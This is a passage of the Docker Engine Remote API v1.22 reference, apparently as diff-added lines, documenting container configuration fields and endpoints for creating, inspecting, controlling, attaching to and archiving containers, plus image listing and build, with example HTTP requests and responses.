+ `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+ - **BlkioDeviceWriteIOps** - Limit write rate (IO per second) to a device in the form of: `"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+ `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+ - 
**MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+ - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+ - **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences.
+ - **PidMode** - Set the PID (Process) Namespace mode for the container;
+ `"container:"`: joins another container's PID namespace
+ `"host"`: use the host's PID namespace inside the container
+ - **PortBindings** - A map of exposed container ports and the host port they
+ should map to. A JSON object in the form
+ `{ /: [{ "HostPort": "" }] }`
+ Take note that `port` is specified as a string and not an integer value.
+ - **PublishAllPorts** - Allocates a random host port for all of a container's
+ exposed ports. Specified as a boolean value.
+ - **Privileged** - Gives the container full access to the host. Specified as
+ a boolean value.
+ - **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+ Specified as a boolean value.
+ - **Dns** - A list of DNS servers for the container to use.
+ - **DnsOptions** - A list of DNS options
+ - **DnsSearch** - A list of DNS search domains
+ - **ExtraHosts** - A list of hostnames/IP mappings to add to the
+ container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+ - **VolumesFrom** - A list of volumes to inherit from another container.
+ Specified in the form `[:]`
+ - **CapAdd** - A list of kernel capabilities to add to the container.
+ - **CapDrop** - A list of kernel capabilities to drop from the container.
+ - **GroupAdd** - A list of additional groups that the container process will run as
+ - **RestartPolicy** – The behavior to apply when the container exits. 
The + value is an object with a `Name` property of either `"always"` to
+ always restart, `"unless-stopped"` to restart always except when
+ user has manually stopped the container or `"on-failure"` to restart only when the container
+ exit code is non-zero. If `on-failure` is used, `MaximumRetryCount`
+ controls the number of times to retry before giving up.
+ The default is not to restart. (optional)
+ An ever increasing delay (double the previous delay, starting at 100ms)
+ is added before each restart to prevent flooding the server.
+ - **NetworkMode** - Sets the networking mode for the container. Supported
+ standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken
+ as a custom network's name to which this container should connect to.
+ - **Devices** - A list of devices to add to the container specified as a JSON object in the
+ form
+ `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+ - **Ulimits** - A list of ulimits to set in the container, specified as
+ `{ "Name": , "Soft": , "Hard": }`, for example:
+ `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+ - **SecurityOpt**: A list of string values to customize labels for MLS
+ systems, such as SELinux.
+ - **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+ `{ "Type": "", "Config": {"key1": "val1"}}`.
+ Available types: `json-file`, `syslog`, `journald`, `gelf`, `awslogs`, `splunk`, `none`.
+ The default is the `json-file` logging driver.
+ - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+ - **VolumeDriver** - Driver that this container uses to mount volumes.
+ - **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. 
+ +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteIOps": [{}], + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + 
"MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "OomScoreAdj": 500, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": 
"/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Dead": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + } + +**Example request, with size information**: + + GET /v1.22/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. 
+ +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. 
Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
+ +**Example request**: + + GET /v1.22/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + 
"throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.22/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.22/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. 
+ +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Update a container + +`POST /containers/(id or name)/update` + +Update resource configs of one or more containers. 
+ +**Example request**: + + POST /v1.22/containers/e90e34656806/update HTTP/1.1 + Content-Type: application/json + + { + "BlkioWeight": 300, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0", + "Memory": 314572800, + "MemorySwap": 514288000, + "MemoryReservation": 209715200, + "KernelMemory": 52428800, + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Warnings": [] + } + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.22/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.22/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.22/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED 
+ Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **409** - container is paused +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. 
+ +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.22/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. 
+ +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.22/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.22/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.22/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. 
+ +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.22/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. 
+ +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.22/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. 
+- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.22/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.22/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. 
In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.22/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. 
